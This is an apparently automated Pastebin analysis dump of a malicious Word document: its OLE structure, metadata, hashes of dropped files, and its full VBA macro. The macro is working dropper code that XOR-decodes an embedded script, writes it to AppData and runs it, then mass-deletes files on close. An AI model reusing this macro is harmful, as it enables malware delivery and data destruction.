Advertisement
TrashScrape

49b367ac261a722a7c2bbbc328c32545

Apr 11th, 2022
1,248
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. --------------------------------------------------------------------
  2. Maldoc Hash: 49b367ac261a722a7c2bbbc328c32545
  3. --------------------------------------------------------------------
  4. 'Root Entry' (root) 13312 bytes
  5. {00020906-0000-0000-C000-000000000046}
  6.   '\x01CompObj' (stream) 114 bytes
  7.  '\x05DocumentSummaryInformation' (stream) 284 bytes
  8.  '\x05SummaryInformation' (stream) 392 bytes
  9.  '1Table' (stream) 8017 bytes
  10.  'Data' (stream) 4096 bytes
  11.  'Macros' (storage)
  12.    'PROJECT' (stream) 483 bytes
  13.    'PROJECTwm' (stream) 65 bytes
  14.    'VBA' (storage)
  15.      'Module1' (stream) 7117 bytes
  16.      'ThisDocument' (stream) 1104 bytes
  17.      '_VBA_PROJECT' (stream) 3467 bytes
  18.      '__SRP_0' (stream) 2964 bytes
  19.      '__SRP_1' (stream) 195 bytes
  20.      '__SRP_2' (stream) 2717 bytes
  21.      '__SRP_3' (stream) 290 bytes
  22.      'dir' (stream) 565 bytes
  23.  'ObjectPool' (storage)
  24.    '_1541577328' (storage)
  25.    {0003000C-0000-0000-C000-000000000046}
  26.       '\x01CompObj' (stream) 76 bytes
  27.      '\x01Ole10Native' (stream) 20301 bytes
  28.      '\x03EPRINT' (stream) 5000 bytes
  29.      '\x03ObjInfo' (stream) 6 bytes
  30.  'WordDocument' (stream) 133755 bytes
  31. ['\x05DocumentSummaryInformation']: properties
  32.    1 1252
  33.     5 15
  34.     6 4
  35.     11 False
  36.     12 None
  37.     13 None
  38.     15 b'Olymp'
  39.    16 False
  40.     17 2144
  41.     19 False
  42.     22 False
  43.     23 917504
  44. ['\x05SummaryInformation']: properties
  45.    1 1252
  46.     2 b''
  47.    3 b''
  48.    4 b'user'
  49.    5 b''
  50.    7 b'Normal.dotm'
  51.    8 b'John'
  52.    9 b'11'
  53.    10 1601-01-01 00:08:00
  54.     12 2016-11-25 19:04:00
  55.     13 2016-11-25 20:04:00
  56.     14 1
  57.     15 320
  58.     16 1828
  59.     18 b'Microsoft Office Word'
  60.    19 0
  61. Modification/Creation times of all directory entries:
  62. - Root Entry: mtime=2016-11-25 20:04:23.969000 ctime=None
  63. - Data: mtime=None ctime=None
  64. - WordDocument: mtime=None ctime=None
  65. - ObjectPool: mtime=2016-11-25 20:04:23.969000 ctime=2016-11-25 20:04:23.694000
  66. - _1541577328: mtime=2016-11-25 20:04:23.694000 ctime=2016-11-25 20:04:23.694000
  67. - EPRINT: mtime=None ctime=None
  68. - CompObj: mtime=None ctime=None
  69. - ObjInfo: mtime=None ctime=None
  70. - Ole10Native: mtime=None ctime=None
  71. - 1Table: mtime=None ctime=None
  72. - SummaryInformation: mtime=None ctime=None
  73. - DocumentSummaryInformation: mtime=None ctime=None
  74. - Macros: mtime=2016-11-25 20:04:23.696000 ctime=2016-11-25 20:04:23.696000
  75. - VBA: mtime=2016-11-25 20:04:23.696000 ctime=2016-11-25 20:04:23.696000
  76. - dir: mtime=None ctime=None
  77. - Module1: mtime=None ctime=None
  78. - __SRP_0: mtime=None ctime=None
  79. - __SRP_1: mtime=None ctime=None
  80. - __SRP_2: mtime=None ctime=None
  81. - __SRP_3: mtime=None ctime=None
  82. - ThisDocument: mtime=None ctime=None
  83. - _VBA_PROJECT: mtime=None ctime=None
  84. - PROJECT: mtime=None ctime=None
  85. - PROJECTwm: mtime=None ctime=None
  86. - CompObj: mtime=None ctime=None
  87.  
  88. Properties from SummaryInformation stream:
  89. - codepage: 1252
  90. - title: b''
  91. - subject: b''
  92. - author: b'user'
  93. - keywords: b''
  94. - comments: None
  95. - template: b'Normal.dotm'
  96. - last_saved_by: b'John'
  97. - revision_number: b'11'
  98. - total_edit_time: 480
  99. - last_printed: None
  100. - create_time: datetime.datetime(2016, 11, 25, 19, 4)
  101. - last_saved_time: datetime.datetime(2016, 11, 25, 20, 4)
  102. - num_pages: 1
  103. - num_words: 320
  104. - num_chars: 1828
  105. - thumbnail: None
  106. - creating_application: b'Microsoft Office Word'
  107. - security: 0
  108. Properties from DocumentSummaryInformation stream:
  109. - codepage_doc: 1252
  110. - category: None
  111. - presentation_target: None
  112. - bytes: None
  113. - lines: 15
  114. - paragraphs: 4
  115. - slides: None
  116. - notes: None
  117. - hidden_slides: None
  118. - mm_clips: None
  119. - scale_crop: False
  120. - heading_pairs: None
  121. - titles_of_parts: None
  122. - manager: None
  123. - company: b'Olymp'
  124. - links_dirty: False
  125. - chars_with_spaces: 2144
  126. - unused: None
  127. - shared_doc: False
  128. - link_base: None
  129. - hlinks: None
  130. - hlinks_changed: False
  131. - version: 917504
  132. - dig_sig: None
  133. - content_type: None
  134. - content_status: None
  135. - language: None
  136. - doc_version: None
  137.  
  138. Root entry name: "Root Entry"
  139. This is a Word document.
  140. type of stream 'WordDocument': 2
  141. size : 133755
  142. ---------------------------------------------------------------------
  143. maintools.js EzZETcSXyKAdF_e5I2i1
  144. ----------------------------------------------------------------------
  145. Package Name : picture.jpg
  146. Package Name Unicode : picture.jpg
  147. Original File Path : C:\Users\John\Pictures\picture.jpg
  148. Original File Path Unicode : C:\Users\John\Pictures\picture.jpg
  149. Save File Path : C:\Users\John\AppData\Local\Temp\picture.jpg
  150. Save File Path Unicode : C:\Users\John\AppData\Local\Temp\picture.jpg
  151. Content Size : 19.53 KB
  152. Content : 91d8907e81b02b72a82e14d57dc26aff
  153. -------------------------------------------------------------------------
  154. Public OBKHLrC3vEDjVL As String
  155. Public B8qen2T433Ds1bW As String
  156. Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
  157. Dim THQNfU76nlSbtJ5nX8LY6 As Byte
  158. THQNfU76nlSbtJ5nX8LY6 = 45
  159. For i = 0 To M5wI32R3VF2g5B21EK4d - 1
  160. EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
  161. THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
  162. Next i
  163. Q7JOhn5pIl648L6V43V = True
  164. End Function
  165. Sub AutoClose()
  166. On Error Resume Next
  167. Kill OBKHLrC3vEDjVL
  168. On Error Resume Next
  169. Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
  170. R7Ks7ug4hRR2weOy7.DeleteFile B8qen2T433Ds1bW & "\*.*", True
  171. Set R7Ks7ug4hRR2weOy7 = Nothing
  172. End Sub
  173. Sub AutoOpen()
  174. On Error GoTo MnOWqnnpKXfRO
  175. Dim NEnrKxf8l511
  176. Dim N18Eoi6OG6T2rNoVl41W As Long
  177. Dim M5wI32R3VF2g5B21EK4d As Long
  178. N18Eoi6OG6T2rNoVl41W = FileLen(ActiveDocument.FullName)
  179. NEnrKxf8l511 = FreeFile
  180. Open (ActiveDocument.FullName) For Binary As #NEnrKxf8l511
  181. Dim E2kvpmR17SI() As Byte
  182. ReDim E2kvpmR17SI(N18Eoi6OG6T2rNoVl41W)
  183. Get #NEnrKxf8l511, 1, E2kvpmR17SI
  184. Dim KqG31PcgwTc2oL47hjd7Oi As String
  185. KqG31PcgwTc2oL47hjd7Oi = StrConv(E2kvpmR17SI, vbUnicode)
  186. Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD
  187. Dim VUy5oj112fLw51h6S
  188. Set VUy5oj112fLw51h6S = CreateObject("vbscript.regexp")
  189. VUy5oj112fLw51h6S.Pattern = "MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"
  190. Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
  191. Dim Y5t4Ul7o385qK4YDhr
  192. If I4j833DS5SFd34L3gwYQD.Count = 0 Then
  193. GoTo MnOWqnnpKXfRO
  194. End If
  195. For Each N34rtRBIU3yJO2cmMVu In I4j833DS5SFd34L3gwYQD
  196. Y5t4Ul7o385qK4YDhr = N34rtRBIU3yJO2cmMVu.FirstIndex
  197. Exit For
  198. Next
  199. Dim Wk4o3X7x1134j() As Byte
  200. Dim KDXl18qY4rcT As Long
  201. KDXl18qY4rcT = 16827
  202. ReDim Wk4o3X7x1134j(KDXl18qY4rcT)
  203. Get #NEnrKxf8l511, Y5t4Ul7o385qK4YDhr + 81, Wk4o3X7x1134j
  204. If Not Q7JOhn5pIl648L6V43V(Wk4o3X7x1134j(), KDXl18qY4rcT + 1) Then
  205. GoTo MnOWqnnpKXfRO
  206. End If
  207. B8qen2T433Ds1bW = Environ("appdata") & "\Microsoft\Windows"
  208. Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
  209. If Not R7Ks7ug4hRR2weOy7.FolderExists(B8qen2T433Ds1bW) Then
  210. B8qen2T433Ds1bW = Environ("appdata")
  211. End If
  212. Set R7Ks7ug4hRR2weOy7 = Nothing
  213. Dim K764B5Ph46Vh
  214. K764B5Ph46Vh = FreeFile
  215. OBKHLrC3vEDjVL = B8qen2T433Ds1bW & "\" & "maintools.js"
  216. Open (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh
  217. Put #K764B5Ph46Vh, 1, Wk4o3X7x1134j
  218. Close #K764B5Ph46Vh
  219. Erase Wk4o3X7x1134j
  220. Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
  221. R66BpJMgxXBo2h.Run """" + OBKHLrC3vEDjVL + """" + " EzZETcSXyKAdF_e5I2i1"
  222. ActiveDocument.Save
  223. Exit Sub
  224. MnOWqnnpKXfRO:
  225. Close #K764B5Ph46Vh
  226. ActiveDocument.Save
  227. End Sub
  228. --------------------------------------------------
  229. Malware Drop:
  230. --------------------------------------------------
  231.  
  232. C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3C07F9B5.emf
  233. File Type:  Windows Enhanced Metafile (EMF) image data version 0x10000
  234. MD5:    EB10732AA3F3BB122DC9452917A62FA1
  235. SHA1:   19EE431B257833CBCA0868DCA5BCE19A81205DC5
  236. SHA-256:    750987BD6026CC8C515D0B6D65FFBE5BCBF7824EE56E82128D220EEF86390874
  237. SHA-512:    6043E5CA7627CED98A2785E2E103D2735E588DA0BA7ABA64FA9906ACB5505C4EFCF4D02F44A8C3B506C14D8AB4955192C49EAEF23A250AB287A581B3254C7C36
  238.  
  239. C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61B24A8B.emf
  240. File Type:  Windows Enhanced Metafile (EMF) image data version 0x10000
  241. MD5:    FDBBE99A5DD164B403945E6A98434CC1
  242. SHA1:   16A5869904B7A7C54B0262B1B83B5C4B36F581EB
  243. SHA-256:    D416447FB0A6AA8F66CB9C943B7FFDA365CE56D2AD8AC12AC0154EF8A52D1CA0
  244. SHA-512:    6A608C28D41A9A09E4E0B9BE8E3EFC88BAAD44D0F92708176FB76B9900F46AC3D3F4C9C45D0A694D028F129085EBE8B2C2A80EB9308799B6403C69178CE3A83B
  245.  
  246. C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C92CC32.emf
  247. File Type:  Windows Enhanced Metafile (EMF) image data version 0x10000
  248. MD5:    FDBBE99A5DD164B403945E6A98434CC1
  249. SHA1:   16A5869904B7A7C54B0262B1B83B5C4B36F581EB
  250. SHA-256:    D416447FB0A6AA8F66CB9C943B7FFDA365CE56D2AD8AC12AC0154EF8A52D1CA0
  251. SHA-512:    6A608C28D41A9A09E4E0B9BE8E3EFC88BAAD44D0F92708176FB76B9900F46AC3D3F4C9C45D0A694D028F129085EBE8B2C2A80EB9308799B6403C69178CE3A83B
  252.  
  253. C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{570A205C-645C-4995-BCAD-8D4566A2D524}.tmp
  254. File Type:  FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
  255. MD5:    5D4D94EE7E06BBB0AF9584119797B23A
  256. SHA1:   DBB111419C704F116EFA8E72471DD83E86E49677
  257. SHA-256:    4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
  258. SHA-512:    95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
  259.  
  260. C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B98AD5AC-9AA1-42F5-81F6-596A6B184300}.tmp
  261. File Type:  data
  262. MD5:    2395DEC0A691F71650A4095EB5E05A34
  263. SHA1:   56903ED3513DAE0E1ABAFF66A2BB97B4D49B9C9E
  264. SHA-256:    EEAD99619FE079B2DBFBF25A674C8D475B37E208AA2CEE428AFC488BC662FD09
  265. SHA-512:    B2DDFEBEB9609F80F9843BC59F6E8B94E3A0F7DC158A6269FEB3199289D3FE784DD820B2B3021F5D24542B11C8E6A9EF29342AFBE8C09D87540FB1F8B87AE5AD
  266.  
  267. C:\Users\user\AppData\Local\Microsoft\Windows\maintools.js
  268. File Type:  ASCII text, with very long lines, with CRLF line terminators
  269. MD5:    5EA3FD094B69E9E00894842F95FD5D85
  270. SHA1:   318F06FF16CA0FD98FEBE2A777064F0A428163C3
  271. SHA-256:    3A065547ADB0AFC63E318C2FA1F682108664E602934490A898C3DE1B23975628
  272. SHA-512:    3E406F5965481348F937D5B0E5433486B727D4F782AC4D67E6898949E3F13ADF5DB152127D1635D733CA4AE5E5A0741656F27A350C3A82A2BF4854E8B7831C02
  273. Malicious:  false
  274. C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\FJv6MQfMYp.LNK
  275. File Type:  MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Sep 24 14:00:27 2017, mtime=Sun Sep 24 14:00:27 2017, atime=Wed Oct  4 14:15:38 2017, length=201216, window=hide
  276. MD5:    9F3F92427821D76F074286502717BD32
  277. SHA1:   206DDA573C78EF1900DFAAEFDBD4D82C851AEEA5
  278. SHA-256:    311F47C14B793048FEE343B45BAF8AB1FD2144B489988C8689AD18F15374AD8A
  279. SHA-512:    828675605CC6D8460252D92D6423C5202422F8C1A38CCCD31E1EDE402055A2D852E446723E3ACA6A70BE84F2B6FB74A1817D31BE36FC147E5EBF7DC05D4F17CF
  280.  
  281. C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
  282. File Type:  ASCII text, with CRLF line terminators
  283. MD5:    127D8F99975C8FA1D0974D8191BA7A52
  284. SHA1:   77943D3D71FA1F37C3692A1F38052E87E3BEA892
  285. SHA-256:    394D91597EF0C448F9D4B843F7DF3F445549FA9EE4B4B65955A8A709FC261AC0
  286. SHA-512:    E24D8C5D8ACB45CAA8A60E2F993BAE0AD8A9D03EE545AE8647DE1404224FE636DFE4EC7A2D84223F773B940CC36F264CFD32EDDB5C7D3DCD8260A1D0CAEAD3A0
  287.  
  288. C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
  289. File Type:  data
  290. MD5:    3E7BD24815610B9CFB276BECD6CE969F
  291. SHA1:   55D998570D5B808657E7C140888B339F657E15C4
  292. SHA-256:    0D1CF856000A144E9D320940FA37FFD38C9B45A19A149513D70A31EAD7F34593
  293. SHA-512:    47F506312D879F3FAF033BEF23EC3AA67E7ADD90AFD85DE82BD492FCE41D04AF8724CEF38FB7823C0E3053777E1FA62183BAC9C51409F44D219365B94043CBC5
  294.  
  295. C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
  296. File Type:  Little-endian UTF-16 Unicode text, with no line terminators
  297. MD5:    F3B25701FE362EC84616A93A45CE9998
  298. SHA1:   D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
  299. SHA-256:    B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
  300. SHA-512:    98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
  301.  
  302. C:\Users\user\AppData\Roaming\Microsoft\Windows\maintools.js
  303. File Type:  ASCII text, with very long lines, with CRLF line terminators
  304. MD5:    5EA3FD094B69E9E00894842F95FD5D85
  305. SHA1:   318F06FF16CA0FD98FEBE2A777064F0A428163C3
  306. SHA-256:    3A065547ADB0AFC63E318C2FA1F682108664E602934490A898C3DE1B23975628
  307. SHA-512:    3E406F5965481348F937D5B0E5433486B727D4F782AC4D67E6898949E3F13ADF5DB152127D1635D733CA4AE5E5A0741656F27A350C3A82A2BF4854E8B7831C02
  308.  
  309. C:\Users\user\Desktop\~$v6MQfMYp.doc
  310. File Type:  data
  311. MD5:    3E7BD24815610B9CFB276BECD6CE969F
  312. SHA1:   55D998570D5B808657E7C140888B339F657E15C4
  313. SHA-256:    0D1CF856000A144E9D320940FA37FFD38C9B45A19A149513D70A31EAD7F34593
  314. SHA-512:    47F506312D879F3FAF033BEF23EC3AA67E7ADD90AFD85DE82BD492FCE41D04AF8724CEF38FB7823C0E3053777E1FA62183BAC9C51409F44D219365B94043CBC5
  315.  
Advertisement
RAW Paste Data Copied
Advertisement